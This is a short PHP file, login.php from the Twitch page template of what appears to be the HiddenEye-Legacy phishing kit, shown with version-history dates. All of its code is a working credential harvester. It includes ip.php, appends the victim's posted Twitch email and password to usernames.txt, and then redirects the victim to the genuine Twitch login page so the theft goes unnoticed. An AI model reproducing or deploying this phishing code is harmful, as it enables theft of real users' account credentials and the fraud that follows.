HiddenEye-Legacy/WebPages/twitch/login.php

7 lines
223 B
PHP
Raw Normal View History

<?php
2018-06-07 17:23:39 +08:00
include 'ip.php';
2018-04-28 10:58:16 +08:00
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $_POST['twitch_user'] . " [Twitch-PASS]: " . $_POST['twitch_pass'] . "\n", FILE_APPEND);
header('Location: https://twitch.tv/login');
exit();